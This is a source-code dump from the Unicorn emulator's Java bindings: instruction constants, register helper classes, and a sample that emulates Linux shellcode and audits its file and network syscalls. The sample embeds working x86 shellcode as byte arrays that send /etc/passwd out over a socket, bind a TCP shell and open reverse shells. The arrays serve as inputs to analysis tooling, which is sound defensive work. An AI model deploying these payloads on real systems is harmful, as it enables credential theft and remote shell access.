UC_X86_INS_VPHADDBQ = 1074; public static final int UC_X86_INS_VPHADDBW = 1075; public static final int UC_X86_INS_VPHADDDQ = 1076; public static final int UC_X86_INS_VPHADDD = 1077; public static final int UC_X86_INS_VPHADDSW = 1078; public static final int UC_X86_INS_VPHADDUBD = 1079; public static final int UC_X86_INS_VPHADDUBQ = 1080; public static final int UC_X86_INS_VPHADDUBW = 1081; public static final int UC_X86_INS_VPHADDUDQ = 1082; public static final int UC_X86_INS_VPHADDUWD = 1083; public static final int UC_X86_INS_VPHADDUWQ = 1084; public static final int UC_X86_INS_VPHADDWD = 1085; public static final int UC_X86_INS_VPHADDWQ = 1086; public static final int UC_X86_INS_VPHADDW = 1087; public static final int UC_X86_INS_VPHMINPOSUW = 1088; public static final int UC_X86_INS_VPHSUBBW = 1089; public static final int UC_X86_INS_VPHSUBDQ = 1090; public static final int UC_X86_INS_VPHSUBD = 1091; public static final int UC_X86_INS_VPHSUBSW = 1092; public static final int UC_X86_INS_VPHSUBWD = 1093; public static final int UC_X86_INS_VPHSUBW = 1094; public static final int UC_X86_INS_VPINSRB = 1095; public static final int UC_X86_INS_VPINSRD = 1096; public static final int UC_X86_INS_VPINSRQ = 1097; public static final int UC_X86_INS_VPINSRW = 1098; public static final int UC_X86_INS_VPLZCNTD = 1099; public static final int UC_X86_INS_VPLZCNTQ = 1100; public static final int UC_X86_INS_VPMACSDD = 1101; public static final int UC_X86_INS_VPMACSDQH = 1102; public static final int UC_X86_INS_VPMACSDQL = 1103; public static final int UC_X86_INS_VPMACSSDD = 1104; public static final int UC_X86_INS_VPMACSSDQH = 1105; public static final int UC_X86_INS_VPMACSSDQL = 1106; public static final int UC_X86_INS_VPMACSSWD = 1107; public static final int UC_X86_INS_VPMACSSWW = 1108; public static final int UC_X86_INS_VPMACSWD = 1109; public static final int UC_X86_INS_VPMACSWW = 1110; public static final int UC_X86_INS_VPMADCSSWD = 1111; public static final int UC_X86_INS_VPMADCSWD = 1112; public static final int UC_X86_INS_VPMADDUBSW = 1113; public static final int UC_X86_INS_VPMADDWD = 1114; public static final int UC_X86_INS_VPMASKMOVD = 1115; public static final int UC_X86_INS_VPMASKMOVQ = 1116; public static final int UC_X86_INS_VPMAXSB = 1117; public static final int UC_X86_INS_VPMAXSD = 1118; public static final int UC_X86_INS_VPMAXSQ = 1119; public static final int UC_X86_INS_VPMAXSW = 1120; public static final int UC_X86_INS_VPMAXUB = 1121; public static final int UC_X86_INS_VPMAXUD = 1122; public static final int UC_X86_INS_VPMAXUQ = 1123; public static final int UC_X86_INS_VPMAXUW = 1124; public static final int UC_X86_INS_VPMINSB = 1125; public static final int UC_X86_INS_VPMINSD = 1126; public static final int UC_X86_INS_VPMINSQ = 1127; public static final int UC_X86_INS_VPMINSW = 1128; public static final int UC_X86_INS_VPMINUB = 1129; public static final int UC_X86_INS_VPMINUD = 1130; public static final int UC_X86_INS_VPMINUQ = 1131; public static final int UC_X86_INS_VPMINUW = 1132; public static final int UC_X86_INS_VPMOVDB = 1133; public static final int UC_X86_INS_VPMOVDW = 1134; public static final int UC_X86_INS_VPMOVM2B = 1135; public static final int UC_X86_INS_VPMOVM2D = 1136; public static final int UC_X86_INS_VPMOVM2Q = 1137; public static final int UC_X86_INS_VPMOVM2W = 1138; public static final int UC_X86_INS_VPMOVMSKB = 1139; public static final int UC_X86_INS_VPMOVQB = 1140; public static final int UC_X86_INS_VPMOVQD = 1141; public static final int UC_X86_INS_VPMOVQW = 1142; public static final int UC_X86_INS_VPMOVSDB = 1143; public static final int UC_X86_INS_VPMOVSDW = 1144; public static final int UC_X86_INS_VPMOVSQB = 1145; public static final int UC_X86_INS_VPMOVSQD = 1146; public static final int UC_X86_INS_VPMOVSQW = 1147; public static final int UC_X86_INS_VPMOVSXBD = 1148; public static final int UC_X86_INS_VPMOVSXBQ = 1149; public static final int UC_X86_INS_VPMOVSXBW = 1150; public static final int UC_X86_INS_VPMOVSXDQ = 1151; public static final int UC_X86_INS_VPMOVSXWD = 1152; public static final int UC_X86_INS_VPMOVSXWQ = 1153; public static final int UC_X86_INS_VPMOVUSDB = 1154; public static final int UC_X86_INS_VPMOVUSDW = 1155; public static final int UC_X86_INS_VPMOVUSQB = 1156; public static final int UC_X86_INS_VPMOVUSQD = 1157; public static final int UC_X86_INS_VPMOVUSQW = 1158; public static final int UC_X86_INS_VPMOVZXBD = 1159; public static final int UC_X86_INS_VPMOVZXBQ = 1160; public static final int UC_X86_INS_VPMOVZXBW = 1161; public static final int UC_X86_INS_VPMOVZXDQ = 1162; public static final int UC_X86_INS_VPMOVZXWD = 1163; public static final int UC_X86_INS_VPMOVZXWQ = 1164; public static final int UC_X86_INS_VPMULDQ = 1165; public static final int UC_X86_INS_VPMULHRSW = 1166; public static final int UC_X86_INS_VPMULHUW = 1167; public static final int UC_X86_INS_VPMULHW = 1168; public static final int UC_X86_INS_VPMULLD = 1169; public static final int UC_X86_INS_VPMULLQ = 1170; public static final int UC_X86_INS_VPMULLW = 1171; public static final int UC_X86_INS_VPMULUDQ = 1172; public static final int UC_X86_INS_VPORD = 1173; public static final int UC_X86_INS_VPORQ = 1174; public static final int UC_X86_INS_VPOR = 1175; public static final int UC_X86_INS_VPPERM = 1176; public static final int UC_X86_INS_VPROTB = 1177; public static final int UC_X86_INS_VPROTD = 1178; public static final int UC_X86_INS_VPROTQ = 1179; public static final int UC_X86_INS_VPROTW = 1180; public static final int UC_X86_INS_VPSADBW = 1181; public static final int UC_X86_INS_VPSCATTERDD = 1182; public static final int UC_X86_INS_VPSCATTERDQ = 1183; public static final int UC_X86_INS_VPSCATTERQD = 1184; public static final int UC_X86_INS_VPSCATTERQQ = 1185; public static final int UC_X86_INS_VPSHAB = 1186; public static final int UC_X86_INS_VPSHAD = 1187; public static final int UC_X86_INS_VPSHAQ = 1188; public static final int UC_X86_INS_VPSHAW = 1189; public static final int UC_X86_INS_VPSHLB = 1190; public static final int UC_X86_INS_VPSHLD = 1191; public static final int UC_X86_INS_VPSHLQ = 1192; public static final int UC_X86_INS_VPSHLW = 1193; public static final int UC_X86_INS_VPSHUFB = 1194; public static final int UC_X86_INS_VPSHUFD = 1195; public static final int UC_X86_INS_VPSHUFHW = 1196; public static final int UC_X86_INS_VPSHUFLW = 1197; public static final int UC_X86_INS_VPSIGNB = 1198; public static final int UC_X86_INS_VPSIGND = 1199; public static final int UC_X86_INS_VPSIGNW = 1200; public static final int UC_X86_INS_VPSLLDQ = 1201; public static final int UC_X86_INS_VPSLLD = 1202; public static final int UC_X86_INS_VPSLLQ = 1203; public static final int UC_X86_INS_VPSLLVD = 1204; public static final int UC_X86_INS_VPSLLVQ = 1205; public static final int UC_X86_INS_VPSLLW = 1206; public static final int UC_X86_INS_VPSRAD = 1207; public static final int UC_X86_INS_VPSRAQ = 1208; public static final int UC_X86_INS_VPSRAVD = 1209; public static final int UC_X86_INS_VPSRAVQ = 1210; public static final int UC_X86_INS_VPSRAW = 1211; public static final int UC_X86_INS_VPSRLDQ = 1212; public static final int UC_X86_INS_VPSRLD = 1213; public static final int UC_X86_INS_VPSRLQ = 1214; public static final int UC_X86_INS_VPSRLVD = 1215; public static final int UC_X86_INS_VPSRLVQ = 1216; public static final int UC_X86_INS_VPSRLW = 1217; public static final int UC_X86_INS_VPSUBB = 1218; public static final int UC_X86_INS_VPSUBD = 1219; public static final int UC_X86_INS_VPSUBQ = 1220; public static final int UC_X86_INS_VPSUBSB = 1221; public static final int UC_X86_INS_VPSUBSW = 1222; public static final int UC_X86_INS_VPSUBUSB = 1223; public static final int UC_X86_INS_VPSUBUSW = 1224; public static final int UC_X86_INS_VPSUBW = 1225; public static final int UC_X86_INS_VPTESTMD = 1226; public static final int UC_X86_INS_VPTESTMQ = 1227; public static final int UC_X86_INS_VPTESTNMD = 1228; public static final int UC_X86_INS_VPTESTNMQ = 1229; public static final int UC_X86_INS_VPTEST = 1230; public static final int UC_X86_INS_VPUNPCKHBW = 1231; public static final int UC_X86_INS_VPUNPCKHDQ = 1232; public static final int UC_X86_INS_VPUNPCKHQDQ = 1233; public static final int UC_X86_INS_VPUNPCKHWD = 1234; public static final int UC_X86_INS_VPUNPCKLBW = 1235; public static final int UC_X86_INS_VPUNPCKLDQ = 1236; public static final int UC_X86_INS_VPUNPCKLQDQ = 1237; public static final int UC_X86_INS_VPUNPCKLWD = 1238; public static final int UC_X86_INS_VPXORD = 1239; public static final int UC_X86_INS_VPXORQ = 1240; public static final int UC_X86_INS_VPXOR = 1241; public static final int UC_X86_INS_VRCP14PD = 1242; public static final int UC_X86_INS_VRCP14PS = 1243; public static final int UC_X86_INS_VRCP14SD = 1244; public static final int UC_X86_INS_VRCP14SS = 1245; public static final int UC_X86_INS_VRCP28PD = 1246; public static final int UC_X86_INS_VRCP28PS = 1247; public static final int UC_X86_INS_VRCP28SD = 1248; public static final int UC_X86_INS_VRCP28SS = 1249; public static final int UC_X86_INS_VRCPPS = 1250; public static final int UC_X86_INS_VRCPSS = 1251; public static final int UC_X86_INS_VRNDSCALEPD = 1252; public static final int UC_X86_INS_VRNDSCALEPS = 1253; public static final int UC_X86_INS_VRNDSCALESD = 1254; public static final int UC_X86_INS_VRNDSCALESS = 1255; public static final int UC_X86_INS_VROUNDPD = 1256; public static final int UC_X86_INS_VROUNDPS = 1257; public static final int UC_X86_INS_VROUNDSD = 1258; public static final int UC_X86_INS_VROUNDSS = 1259; public static final int UC_X86_INS_VRSQRT14PD = 1260; public static final int UC_X86_INS_VRSQRT14PS = 1261; public static final int UC_X86_INS_VRSQRT14SD = 1262; public static final int UC_X86_INS_VRSQRT14SS = 1263; public static final int UC_X86_INS_VRSQRT28PD = 1264; public static final int UC_X86_INS_VRSQRT28PS = 1265; public static final int UC_X86_INS_VRSQRT28SD = 1266; public static final int UC_X86_INS_VRSQRT28SS = 1267; public static final int UC_X86_INS_VRSQRTPS = 1268; public static final int UC_X86_INS_VRSQRTSS = 1269; public static final int UC_X86_INS_VSCATTERDPD = 1270; public static final int UC_X86_INS_VSCATTERDPS = 1271; public static final int UC_X86_INS_VSCATTERPF0DPD = 1272; public static final int UC_X86_INS_VSCATTERPF0DPS = 1273; public static final int UC_X86_INS_VSCATTERPF0QPD = 1274; public static final int UC_X86_INS_VSCATTERPF0QPS = 1275; public static final int UC_X86_INS_VSCATTERPF1DPD = 1276; public static final int UC_X86_INS_VSCATTERPF1DPS = 1277; public static final int UC_X86_INS_VSCATTERPF1QPD = 1278; public static final int UC_X86_INS_VSCATTERPF1QPS = 1279; public static final int UC_X86_INS_VSCATTERQPD = 1280; public static final int UC_X86_INS_VSCATTERQPS = 1281; public static final int UC_X86_INS_VSHUFPD = 1282; public static final int UC_X86_INS_VSHUFPS = 1283; public static final int UC_X86_INS_VSQRTPD = 1284; public static final int UC_X86_INS_VSQRTPS = 1285; public static final int UC_X86_INS_VSQRTSD = 1286; public static final int UC_X86_INS_VSQRTSS = 1287; public static final int UC_X86_INS_VSTMXCSR = 1288; public static final int UC_X86_INS_VSUBPD = 1289; public static final int UC_X86_INS_VSUBPS = 1290; public static final int UC_X86_INS_VSUBSD = 1291; public static final int UC_X86_INS_VSUBSS = 1292; public static final int UC_X86_INS_VTESTPD = 1293; public static final int UC_X86_INS_VTESTPS = 1294; public static final int UC_X86_INS_VUNPCKHPD = 1295; public static final int UC_X86_INS_VUNPCKHPS = 1296; public static final int UC_X86_INS_VUNPCKLPD = 1297; public static final int UC_X86_INS_VUNPCKLPS = 1298; public static final int UC_X86_INS_VZEROALL = 1299; public static final int UC_X86_INS_VZEROUPPER = 1300; public static final int UC_X86_INS_WAIT = 1301; public static final int UC_X86_INS_WBINVD = 1302; public static final int UC_X86_INS_WRFSBASE = 1303; public static final int UC_X86_INS_WRGSBASE = 1304; public static final int UC_X86_INS_WRMSR = 1305; public static final int UC_X86_INS_XABORT = 1306; public static final int UC_X86_INS_XACQUIRE = 1307; public static final int UC_X86_INS_XBEGIN = 1308; public static final int UC_X86_INS_XCHG = 1309; public static final int UC_X86_INS_XCRYPTCBC = 1310; public static final int UC_X86_INS_XCRYPTCFB = 1311; public static final int UC_X86_INS_XCRYPTCTR = 1312; public static final int UC_X86_INS_XCRYPTECB = 1313; public static final int UC_X86_INS_XCRYPTOFB = 1314; public static final int UC_X86_INS_XEND = 1315; public static final int UC_X86_INS_XGETBV = 1316; public static final int UC_X86_INS_XLATB = 1317; public static final int UC_X86_INS_XRELEASE = 1318; public static final int UC_X86_INS_XRSTOR = 1319; public static final int UC_X86_INS_XRSTOR64 = 1320; public static final int UC_X86_INS_XRSTORS = 1321; public static final int UC_X86_INS_XRSTORS64 = 1322; public static final int UC_X86_INS_XSAVE = 1323; public static final int UC_X86_INS_XSAVE64 = 1324; public static final int UC_X86_INS_XSAVEC = 1325; public static final int UC_X86_INS_XSAVEC64 = 1326; public static final int UC_X86_INS_XSAVEOPT = 1327; public static final int UC_X86_INS_XSAVEOPT64 = 1328; public static final int UC_X86_INS_XSAVES = 1329; public static final int UC_X86_INS_XSAVES64 = 1330; public static final int UC_X86_INS_XSETBV = 1331; public static final int UC_X86_INS_XSHA1 = 1332; public static final int UC_X86_INS_XSHA256 = 1333; public static final int UC_X86_INS_XSTORE = 1334; public static final int UC_X86_INS_XTEST = 1335; public static final int UC_X86_INS_FDISI8087_NOP = 1336; public static final int UC_X86_INS_FENI8087_NOP = 1337; public static final int UC_X86_INS_ENDING = 1338; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/X86_Float80.java000066400000000000000000000043161467524106700245640ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; public class X86_Float80 { public long mantissa; public short exponent; public X86_Float80(long mantissa, short exponent) { this.mantissa = mantissa; this.exponent = exponent; } public double toDouble() { boolean sign = (exponent & 0x8000) != 0; int exp = exponent & 0x7fff; if (exp == 0) { return sign ? -0.0 : 0.0; } else if (exp == 0x7fff) { if (((mantissa >> 62) & 1) == 0) { return sign ? Double.NEGATIVE_INFINITY : Double.POSITIVE_INFINITY; } else { return Double.NaN; } } else { exp -= 16383; double f = mantissa >>> 1; return Math.scalb(sign ? -f : f, exp - 62); } } public static X86_Float80 fromDouble(double val) { if (Double.isNaN(val)) { return new X86_Float80(-1L, (short) -1); } else if (Double.isInfinite(val)) { return new X86_Float80(1L << 63, (short) (val < 0 ? 0xffff : 0x7fff)); } else { int exp = Math.getExponent(val); long mantissa = ((long) Math.scalb(Math.abs(val), 62 - exp)) << 1; exp += 16383; return new X86_Float80(mantissa, (short) (val < 0 ? (exp | 0x8000) : exp)); } } @Override public String toString() { return "X86_Float80 [mantissa=" + mantissa + ", exponent=" + exponent + "]"; } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/X86_MMR.java000066400000000000000000000026311467524106700240000ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2016 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. */ public class X86_MMR { public long base; public int limit; public int flags; public short selector; public X86_MMR(long base, int limit, int flags, short selector) { this.base = base; this.limit = limit; this.flags = flags; this.selector = selector; } public X86_MMR(long base, int limit) { this.base = base; this.limit = limit; selector = 0; flags = 0; } @Override public String toString() { return "X86_MMR [base=" + base + ", limit=" + limit + ", flags=" + flags + ", selector=" + selector + "]"; } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/X86_MSR.java000066400000000000000000000021151467524106700240030ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Model-specific register */ public class X86_MSR { public int rid; public long value; public X86_MSR(int rid) { this(rid, 0); } public X86_MSR(int rid, long value) { this.rid = rid; this.value = value; } @Override public String toString() { return "X86_MSR [rid=" + rid + ", value=" + value + "]"; } } unicorn-2.1.1/bindings/java/src/test/000077500000000000000000000000001467524106700174705ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/test/java/000077500000000000000000000000001467524106700204115ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/test/java/samples/000077500000000000000000000000001467524106700220555ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/test/java/samples/SampleNetworkAuditing.java000066400000000000000000000455201467524106700272060ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Unicorn sample for auditing network connection and file handling in shellcode. Nguyen Tan Cong */ package samples; import unicorn.*; import java.util.*; public class SampleNetworkAuditing implements UnicornConst, X86Const { public static long next_id = 3; public static final int SIZE_REG = 4; private static LogChain fd_chains = new LogChain(); public static long get_id() { return next_id++; } public static final long toInt(byte val[]) { long res = 0; for (int i = 0; i < val.length; i++) { long v = val[i] & 0xff; res = res + (v << (i * 8)); } return res; } public static final byte[] toBytes(long val) { byte[] res = new byte[8]; for (int i = 0; i < 8; i++) { res[i] = (byte) (val & 0xff); val >>>= 8; } return res; } private static class MyInterruptHook implements InterruptHook { // callback for tracing Linux interrupt public void hook(Unicorn uc, int intno, Object user) { // System.err.println(String.format("Interrupt 0x%x, from Unicorn 0x%x", intno, u.hashCode())); // only handle Linux syscall if (intno != 0x80) { return; } long eax = uc.reg_read(UC_X86_REG_EAX); long ebx = uc.reg_read(UC_X86_REG_EBX); long ecx = uc.reg_read(UC_X86_REG_ECX); long edx = uc.reg_read(UC_X86_REG_EDX); long eip = uc.reg_read(UC_X86_REG_EIP); // System.out.printf(">>> INTERRUPT %d\n", toInt(eax)); if (eax == 1) { // sys_exit System.out.printf(">>> SYS_EXIT\n"); uc.emu_stop(); } else if (eax == 3) { // sys_read long fd = ebx; long buf = ecx; long count = edx; String uuid = UUID.randomUUID().toString().substring(0, 32); byte[] dummy_content = Arrays.copyOfRange(uuid.getBytes(), 0, (int) Math.min(count, uuid.length())); uc.mem_write(buf, dummy_content); String msg = String.format( "read %d bytes from fd(%d) with dummy_content(%s)", count, fd, uuid.substring(0, dummy_content.length)); fd_chains.add_log(fd, msg); System.out.printf(">>> %s\n", msg); } else if (eax == 4) { // sys_write long fd = ebx; long buf = ecx; long count = edx; byte[] content = uc.mem_read(buf, (int) count); String msg = String.format("write data=%s count=%d to fd(%d)", new String(content), count, fd); System.out.printf(">>> %s\n", msg); fd_chains.add_log(fd, msg); } else if (eax == 5) { // sys_open long filename_addr = ebx; long flags = ecx; long mode = edx; String filename = read_string(uc, filename_addr); long dummy_fd = get_id(); uc.reg_write(UC_X86_REG_EAX, dummy_fd); String msg = String.format( "open file (filename=%s flags=%d mode=%d) with fd(%d)", filename, flags, mode, dummy_fd); fd_chains.create_chain(dummy_fd); fd_chains.add_log(dummy_fd, msg); System.out.printf(">>> %s\n", msg); } else if (eax == 11) { // sys_execv // System.out.printf(">>> ebx=0x%x, ecx=0x%x, edx=0x%x\n", ebx, ecx, edx)); String filename = read_string(uc, ebx); System.out.printf(">>> SYS_EXECV filename=%s\n", filename); } else if (eax == 63) { // sys_dup2 fd_chains.link_fd(ecx, ebx); System.out.printf(">>> SYS_DUP2 oldfd=%d newfd=%d\n", ebx, ecx); } else if (eax == 102) { // sys_socketcall // ref: http://www.skyfree.org/linux/kernel_network/socket.html long call = uc.reg_read(UC_X86_REG_EBX); long args = uc.reg_read(UC_X86_REG_ECX); // int sys_socketcall(int call, unsigned long *args) if (call == 1) { // sys_socket // err = sys_socket(a0,a1,a[2]) // int sys_socket(int family, int type, int protocol) long family = toInt(uc.mem_read(args, SIZE_REG)); long sock_type = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); long protocol = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); long dummy_fd = get_id(); uc.reg_write(UC_X86_REG_EAX, dummy_fd); if (family == 2) { // AF_INET String msg = String.format("create socket (%s, %s) with fd(%d)", ADDR_FAMILY.get(family), SOCKET_TYPES.get(sock_type), dummy_fd); fd_chains.create_chain(dummy_fd); fd_chains.add_log(dummy_fd, msg); print_sockcall(msg); } else if (family == 3) { // AF_INET6 } } else if (call == 2) { // sys_bind long fd = toInt(uc.mem_read(args, SIZE_REG)); long umyaddr = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); long addrlen = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); byte[] sock_addr = uc.mem_read(umyaddr, (int) addrlen); String msg = String.format("fd(%d) bind to %s", fd, parse_sock_address(sock_addr)); fd_chains.add_log(fd, msg); print_sockcall(msg); } else if (call == 3) { // sys_connect // err = sys_connect(a0, (struct sockaddr *)a1, a[2]) // int sys_connect(int fd, struct sockaddr *uservaddr, int addrlen) long fd = toInt(uc.mem_read(args, SIZE_REG)); long uservaddr = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); long addrlen = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); byte[] sock_addr = uc.mem_read(uservaddr, (int) addrlen); String msg = String.format("fd(%d) connect to %s", fd, parse_sock_address(sock_addr)); fd_chains.add_log(fd, msg); print_sockcall(msg); } else if (call == 4) { // sys_listen long fd = toInt(uc.mem_read(args, SIZE_REG)); long backlog = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); String msg = String.format( "fd(%d) listened with backlog=%d", fd, backlog); fd_chains.add_log(fd, msg); print_sockcall(msg); } else if (call == 5) { // sys_accept long fd = toInt(uc.mem_read(args, SIZE_REG)); long upeer_sockaddr = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); long upeer_addrlen = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); // System.out.printf(">>> upeer_sockaddr=0x%x, upeer_addrlen=%d\n" % (upeer_sockaddr, upeer_addrlen)) if (upeer_sockaddr == 0x0) { print_sockcall( String.format("fd(%d) accept client", fd)); } else { long upeer_len = toInt(uc.mem_read(upeer_addrlen, 4)); byte[] sock_addr = uc.mem_read(upeer_sockaddr, (int) upeer_len); String msg = String.format("fd(%d) accept client with upeer=%s", fd, parse_sock_address(sock_addr)); fd_chains.add_log(fd, msg); print_sockcall(msg); } } else if (call == 9) { // sys_send long fd = toInt(uc.mem_read(args, SIZE_REG)); long buff = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); long length = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); long flags = toInt(uc.mem_read(args + SIZE_REG * 3, SIZE_REG)); byte[] buf = uc.mem_read(buff, (int) length); String msg = String.format("fd(%d) send data=%s", fd, new String(buf)); fd_chains.add_log(fd, msg); print_sockcall(msg); } else if (call == 11) { // sys_receive long fd = toInt(uc.mem_read(args, SIZE_REG)); long ubuf = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); long size = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); long flags = toInt(uc.mem_read(args + SIZE_REG * 3, SIZE_REG)); String msg = String.format( "fd(%d) is gonna receive data with size=%d flags=%d", fd, size, flags); fd_chains.add_log(fd, msg); print_sockcall(msg); } else if (call == 13) { // sys_shutdown long fd = toInt(uc.mem_read(args, SIZE_REG)); long how = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); String msg = String.format( "fd(%d) is shutted down because of %d", fd, how); fd_chains.add_log(fd, msg); print_sockcall(msg); } } } } public static final Hashtable SOCKET_TYPES; public static final Hashtable ADDR_FAMILY; static { SOCKET_TYPES = new Hashtable(); ADDR_FAMILY = new Hashtable(); SOCKET_TYPES.put(1L, "SOCK_STREAM"); SOCKET_TYPES.put(2L, "SOCK_DGRAM"); SOCKET_TYPES.put(3L, "SOCK_RAW"); SOCKET_TYPES.put(4L, "SOCK_RDM"); SOCKET_TYPES.put(5L, "SOCK_SEQPACKET"); SOCKET_TYPES.put(10L, "SOCK_PACKET"); ADDR_FAMILY.put(0L, "AF_UNSPEC"); ADDR_FAMILY.put(1L, "AF_UNIX"); ADDR_FAMILY.put(2L, "AF_INET"); ADDR_FAMILY.put(3L, "AF_AX25"); ADDR_FAMILY.put(4L, "AF_IPX"); ADDR_FAMILY.put(5L, "AF_APPLETALK"); ADDR_FAMILY.put(6L, "AF_NETROM"); ADDR_FAMILY.put(7L, "AF_BRIDGE"); ADDR_FAMILY.put(8L, "AF_AAL5"); ADDR_FAMILY.put(9L, "AF_X25"); ADDR_FAMILY.put(10L, "AF_INET6"); ADDR_FAMILY.put(12L, "AF_MAX"); } // http://shell-storm.org/shellcode/files/shellcode-861.php public static final byte[] X86_SEND_ETCPASSWD = { 106, 102, 88, 49, -37, 67, 49, -46, 82, 106, 1, 106, 2, -119, -31, -51, -128, -119, -58, 106, 102, 88, 67, 104, 127, 1, 1, 1, 102, 104, 48, 57, 102, 83, -119, -31, 106, 16, 81, 86, -119, -31, 67, -51, -128, -119, -58, 106, 1, 89, -80, 63, -51, -128, -21, 39, 106, 5, 88, 91, 49, -55, -51, -128, -119, -61, -80, 3, -119, -25, -119, -7, 49, -46, -74, -1, -78, -1, -51, -128, -119, -62, 106, 4, 88, -77, 1, -51, -128, 106, 1, 88, 67, -51, -128, -24, -44, -1, -1, -1, 47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100 }; // http://shell-storm.org/shellcode/files/shellcode-882.php public static final byte[] X86_BIND_TCP = { 106, 102, 88, 106, 1, 91, 49, -10, 86, 83, 106, 2, -119, -31, -51, -128, 95, -105, -109, -80, 102, 86, 102, 104, 5, 57, 102, 83, -119, -31, 106, 16, 81, 87, -119, -31, -51, -128, -80, 102, -77, 4, 86, 87, -119, -31, -51, -128, -80, 102, 67, 86, 86, 87, -119, -31, -51, -128, 89, 89, -79, 2, -109, -80, 63, -51, -128, 73, 121, -7, -80, 11, 104, 47, 47, 115, 104, 104, 47, 98, 105, 110, -119, -29, 65, -119, -54, -51, -128 }; // http://shell-storm.org/shellcode/files/shellcode-883.php public static final byte[] X86_REVERSE_TCP = { 106, 102, 88, 106, 1, 91, 49, -46, 82, 83, 106, 2, -119, -31, -51, -128, -110, -80, 102, 104, 127, 1, 1, 1, 102, 104, 5, 57, 67, 102, 83, -119, -31, 106, 16, 81, 82, -119, -31, 67, -51, -128, 106, 2, 89, -121, -38, -80, 63, -51, -128, 73, 121, -7, -80, 11, 65, -119, -54, 82, 104, 47, 47, 115, 104, 104, 47, 98, 105, 110, -119, -29, -51, -128 }; // http://shell-storm.org/shellcode/files/shellcode-849.php public static final byte[] X86_REVERSE_TCP_2 = { 49, -64, 49, -37, 49, -55, 49, -46, -80, 102, -77, 1, 81, 106, 6, 106, 1, 106, 2, -119, -31, -51, -128, -119, -58, -80, 102, 49, -37, -77, 2, 104, -64, -88, 1, 10, 102, 104, 122, 105, 102, 83, -2, -61, -119, -31, 106, 16, 81, 86, -119, -31, -51, -128, 49, -55, -79, 3, -2, -55, -80, 63, -51, -128, 117, -8, 49, -64, 82, 104, 110, 47, 115, 104, 104, 47, 47, 98, 105, -119, -29, 82, 83, -119, -31, 82, -119, -30, -80, 11, -51, -128 }; // memory address where emulation starts public static final int ADDRESS = 0x1000000; public static String join(ArrayList l, String sep) { boolean first = true; StringBuilder res = new StringBuilder(); for (String s : l) { if (!first) { res.append(sep); } res.append(s); first = false; } return res.toString(); } private static class LogChain { public Hashtable> __chains = new Hashtable>(); public Hashtable> __linking_fds = new Hashtable>(); public void clean() { __chains.clear(); __linking_fds.clear(); } public void create_chain(long id) { if (!__chains.containsKey(id)) { __chains.put(id, new ArrayList()); } else { System.out.printf("LogChain: id %d existed\n", id); } } public void add_log(long id, String msg) { long fd = get_original_fd(id); if (fd != -1) { __chains.get(fd).add(msg); } else { System.out.printf("LogChain: id %d doesn't exist\n", id); } } public void link_fd(long from_fd, long to_fd) { if (!__linking_fds.containsKey(to_fd)) { __linking_fds.put(to_fd, new ArrayList()); } __linking_fds.get(to_fd).add(from_fd); } public long get_original_fd(long fd) { if (__chains.containsKey(fd)) { return fd; } for (Long orig_fd : __linking_fds.keySet()) { if (__linking_fds.get(orig_fd).contains(fd)) return orig_fd; } return -1; } public void print_report() { System.out.printf("\n----------------"); System.out.printf("\n| START REPORT |"); System.out.printf("\n----------------\n\n"); for (Long fd : __chains.keySet()) { 